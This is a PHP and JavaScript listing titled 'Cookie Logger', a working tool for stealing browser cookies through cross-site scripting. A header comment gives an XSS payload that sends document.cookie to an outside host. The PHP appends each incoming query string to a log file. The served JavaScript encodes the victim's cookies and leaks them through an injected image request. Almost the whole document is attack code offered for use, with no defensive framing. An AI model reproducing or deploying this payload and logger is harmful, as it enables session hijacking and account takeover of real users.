Cookie Logger

1. <?php
2. /*
3. * Created on 16. april. 2007
4. * Created by Audun Larsen (audun@munio.no)
5. *
6. * Copyright 2006 Munio IT, Audun Larsen
7. *
8. * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES,
9. * INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
10. * FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
11. * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
12. * (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
13. * OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
14. * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
15. * EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
16. *
17. * CookieLogger.php
18. * CookieLog.txt
19. *
20. * PAYLOAD XSS
21. * <script>document.location="http://www.host.com/mysite/CookieLogger.php?cookie=" + document.cookie;</script>
22. */
23.  
24. if(strlen($_SERVER['QUERY_STRING']) > 0) {
25.     $fp=fopen('./CookieLog.txt', 'a');
26.     fwrite($fp, urldecode($_SERVER['QUERY_STRING'])."\n");
27.     fclose($fp);
28. } else {
29. ?>
30.  
31. var ownUrl = 'http://<?php echo $_SERVER['HTTP_HOST']; ?><?php echo $_SERVER['PHP_SELF']; ?>';
32.  
33. // ==
34. //  URLEncode and URLDecode functions
35. //
36. // Copyright Albion Research Ltd. 2002
37. // http://www.albionresearch.com/
38. //
39. // You may copy these functions providing that
40. // (a) you leave this copyright notice intact, and
41. // (b) if you use these functions on a publicly accessible
42. //  web site you include a credit somewhere on the web site
43. //  with a link back to http://www.albionresearch.com/
44. //
45. // If you find or fix any bugs, please let us know at albionresearch.com
46. //
47. // SpecialThanks to Neelesh Thakur for being the first to
48. // report a bug in URLDecode() - now fixed 2003-02-19.
49. // And thanks to everyone else who has provided comments and suggestions.
50. // ==
51. function URLEncode(str)
52. {
53.     // The Javascript escape and unescape functions do not correspond
54.     // with what browsers actually do...
55.     var SAFECHARS = "0123456789" +        // Numeric
56.         "ABCDEFGHIJKLMNOPQRSTUVWXYZ" +    // Alphabetic
57.         "abcdefghijklmnopqrstuvwxyz" +
58.         "-_.!~*'()";        // RFC2396 Mark characters
59.     var HEX = "0123456789ABCDEF";
60.  
61.     var plaintext = str;
62.     var encoded = "";
63.     for (var i = 0; i < plaintext.length; i++ ) {
64.         var ch = plaintext.charAt(i);
65.         if (ch == " ") {
66.             encoded += "+";                // x-www-urlencoded, rather than %20
67.         } else if (SAFECHARS.indexOf(ch) != -1) {
68.             encoded += ch;
69.         } else {
70.             var charCode = ch.charCodeAt(0);
71.             if (charCode > 255) {
72.                 alert( "Unicode Character '"
73.     + ch
74.     + "' cannot be encoded using standard URL encoding.\n" +
75.                     "(URL encoding only supports 8-bit characters.)\n" +
76.           "A space (+) will be substituted." );
77.                 encoded += "+";
78.             } else {
79.                 encoded += "%";
80.                 encoded += HEX.charAt((charCode >> 4) & 0xF);
81.                 encoded += HEX.charAt(charCode & 0xF);
82.             }
83.         }
84.     } // for
85.  
86.     return encoded;
87. };
88.  
89. cookie = URLEncode(document.cookie);
90. html = '<img src="'+ownUrl+'?'+cookie+'">';
91. document.write(html);
92.  
93. < ?php
94. }
95. ?>